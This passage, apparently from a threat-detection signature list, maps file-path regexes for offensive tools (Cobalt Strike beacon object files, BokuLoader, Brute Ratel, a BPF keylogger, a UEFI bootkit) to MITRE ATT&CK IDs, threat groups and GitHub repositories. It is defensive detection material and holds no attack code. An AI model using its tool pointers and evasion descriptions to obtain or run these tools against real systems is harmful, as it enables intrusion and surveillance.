"*/BofRunner.cs*",".{0,1000}\/BofRunner\.cs.{0,1000}","offensive_tool_keyword","cobaltstrike","A tool to run object files mainly beacon object files (BOF) in .Net.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 
- T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/nettitude/RunOF","1","1","N/A","N/A","10","10","145","21","2023-01-06T15:30:05Z","2022-02-21T13:53:39Z","5751" "*/BOFs.git*",".{0,1000}\/BOFs\.git.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files (BOFs) for shells and lols","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - 
T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/RiccardoAncarani/BOFs","1","1","N/A","N/A","10","10","118","13","2021-09-14T09:03:58Z","2021-08-27T10:04:12Z","5752" "*/bof-vs-template/*",".{0,1000}\/bof\-vs\-template\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Information released publicly by NCC Group's Full Spectrum Attack Simulation (FSAS) team","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - 
BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/nccgroup/nccfsas","1","1","N/A","N/A","10","10","611","110","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z","5753" "*/bof-vs-template/*",".{0,1000}\/bof\-vs\-template\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Spectrum Attack Simulation beacons","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - 
Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/nccgroup/nccfsas/","1","1","N/A","N/A","10","10","611","110","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z","5754" "*/boko.py*",".{0,1000}\/boko\.py.{0,1000}","offensive_tool_keyword","boko","boko.py is an application scanner for macOS that searches for and identifies potential dylib hijacking and weak dylib vulnerabilities for application executables as well as scripts an application may use that have the potential to be backdoored","T1195 - T1078 - T1079 - T1574","TA0006 - TA0008","N/A","N/A","Exploitation tool","https://github.com/bashexplode/boko","1","1","N/A","N/A","N/A","1","71","13","2021-09-28T22:36:01Z","2020-05-22T21:46:33Z","5755" "*/boku7/spawn*",".{0,1000}\/boku7\/spawn.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF that spawns a sacrificial process. injects it with shellcode. and executes payload. Built to evade EDR/UserLand hooks by spawning sacrificial process with Arbitrary Code Guard (ACG). BlockDll. 
and PPID spoofing.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/boku7/spawn","1","1","N/A","N/A","10","10","455","73","2023-03-08T15:53:44Z","2021-07-17T16:35:59Z","5756" "*/boku7/whereami/*",".{0,1000}\/boku7\/whereami\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object File (BOF) that uses handwritten shellcode to return the process Environment strings without touching any DLL's.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - 
T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/boku7/whereami","1","1","N/A","N/A","10","10","172","27","2023-03-13T15:56:38Z","2021-08-19T22:32:34Z","5757" "*/BokuLoader.c*",".{0,1000}\/BokuLoader\.c.{0,1000}","offensive_tool_keyword","cobaltstrike","A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. 
and enhance Cobalt Strike's evasion features!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/boku7/BokuLoader","1","1","N/A","N/A","10","10","1312","255","2023-11-22T22:25:50Z","2021-08-15T18:17:28Z","5758" "*/BokuLoader.h*",".{0,1000}\/BokuLoader\.h.{0,1000}","offensive_tool_keyword","cobaltstrike","A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. 
and enhance Cobalt Strike's evasion features!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/boku7/BokuLoader","1","1","N/A","N/A","10","10","1312","255","2023-11-22T22:25:50Z","2021-08-15T18:17:28Z","5759" "*/BokuLoader/*",".{0,1000}\/BokuLoader\/.{0,1000}","offensive_tool_keyword","cobaltstrike","A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. 
and enhance Cobalt Strike's evasion features!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/boku7/BokuLoader","1","1","N/A","N/A","10","10","1312","255","2023-11-22T22:25:50Z","2021-08-15T18:17:28Z","5760" "*/BooExecutor.cs*",".{0,1000}\/BooExecutor\.cs.{0,1000}","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - 
T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/CCob/BOF.NET","1","1","N/A","N/A","10","10","709","105","2024-09-04T17:10:23Z","2020-11-02T20:02:55Z","5765" "*/bootkit-rs*",".{0,1000}\/bootkit\-rs.{0,1000}","offensive_tool_keyword","bootkit-rs","Rusty Bootkit - Windows UEFI Bootkit in Rust (Codename: RedLotus)","T1542.004 - T1067.002 - T1012 - T1053.005 - T1057","TA0002 - TA0040 - TA0003 - TA0001","N/A","N/A","Defense Evasion","https://github.com/memN0ps/bootkit-rs","1","1","N/A","N/A","N/A","6","528","67","2023-09-12T07:23:15Z","2023-04-11T03:53:15Z","5766" "*/boxreflect.dll*",".{0,1000}\/boxreflect\.dll.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - 
T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","5771" "*/bpf-keylogger.git*",".{0,1000}\/bpf\-keylogger\.git.{0,1000}","offensive_tool_keyword","bpf-keylogger","Keylogger written in BPF","T1056.001 - T1053.005","TA0006 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/SkyperTHC/bpf-keylogger","1","1","N/A","N/A","10","1","4","1","2024-01-29T18:08:01Z","2024-01-29T09:34:47Z","5772" "*/bpf-keylogger/*",".{0,1000}\/bpf\-keylogger\/.{0,1000}","offensive_tool_keyword","bpf-keylogger","Keylogger written in BPF","T1056.001 - T1053.005","TA0006 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/SkyperTHC/bpf-keylogger","1","1","N/A","N/A","10","1","4","1","2024-01-29T18:08:01Z","2024-01-29T09:34:47Z","5773" "*/bq1iFEP2/assert/dll/*",".{0,1000}\/bq1iFEP2\/assert\/dll\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Chinese clone of cobaltstrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - 
BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/YDHCUI/manjusaka","1","1","N/A","N/A","10","10","818","150","2023-05-09T03:31:53Z","2022-03-18T08:16:04Z","5774" "*/bq1iFEP2/assert/exe/*",".{0,1000}\/bq1iFEP2\/assert\/exe\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Chinese clone of cobaltstrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - 
REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/YDHCUI/manjusaka","1","1","N/A","N/A","10","10","818","150","2023-05-09T03:31:53Z","2022-03-18T08:16:04Z","5775" "*/brc-1.2.2.git*",".{0,1000}\/brc\-1\.2\.2\.git.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","5776" "*/BRC4_rar",".{0,1000}\/BRC4_rar","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","5777" "*/breg.x64.o*",".{0,1000}\/breg\.x64\.o.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike beacon object file that allows you to query and make changes to the Windows Registry","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - 
T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/ausecwa/bof-registry","1","1","N/A","N/A","10","10","27","8","2021-02-11T04:38:28Z","2021-01-29T05:07:47Z","5778" "*/breg.x86.o*",".{0,1000}\/breg\.x86\.o.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike beacon object file that allows you to query and make changes to the Windows Registry","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - 